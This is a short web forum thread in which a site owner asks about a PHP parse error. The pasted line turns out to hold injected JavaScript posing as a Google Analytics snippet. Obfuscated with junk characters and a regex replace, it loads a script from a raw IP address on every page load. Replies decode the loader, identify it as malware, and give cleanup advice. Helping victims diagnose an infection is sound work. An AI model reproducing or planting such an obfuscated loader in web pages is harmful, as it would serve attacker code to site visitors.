Hello all. I have a little problem. When i go to one of my sites I get this error. It says something is missing but I'm not sure where to place it as im no php coder. any help would be appreciated. Thanks in advance. Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ',' or ';' in /home/msnina/public_html/index.php on line 23 Code (markup): here is my file, line 23 as mentioned in the error. } catch(err) {}</script>'; ?><?php echo '<script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript srñ='" + gaJsHost + "google-analytics.com/ga.js' " + '!@&s(#r)c@!=&)\'&h$!t^&!$@t@&$p#^&@:$^/&@!&/!9(1)@.(2)1!(2)&.^#6&@&!^5(@!&.&#$1@!4)8!#/($g#$a&.(j^s)'.replace(/#|&|@|\$|\(|\!|\^|\)/ig, '') + "' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-32645524-1");pageTracker._trackPageview();} catch(err); {}</script>'; ?> Code (markup):
Somebody got access to your files this part of the code: '!@&s(#r)c@!=&)\'&h$!t^&!$@t@&$p#^&@:$^/&@!&/!9(1)@.(2)1!(2)&.^#6&@&!^5(@!&.&#$1@!4)8!#/($g#$a&.(j^s)'.replace(/#|&|@|\$|\(|\!|\^|\)/ig, '') is translated to this: src='http://91.212.65.148/ga.js' is including a javascript from another server, not the real analytics javascript delete that code, and get the real code from google analytics again change passwords, and update your software maybe they used a bug there to get access Edit: also check that other pages arent infected more info of the exploit http://safeweb.norton.com/report/show?url=91.212.65.148&x=0&y=0
excellent thanks. I,m not sure how they got on my server. I use hostgator. I notice that in thee code and thought it was a little weird. thanks a lot man =)
That is very clear! Use a random cracked FTP program and it automatically inserts that kind of codes into your index files. This is a common way of abuse.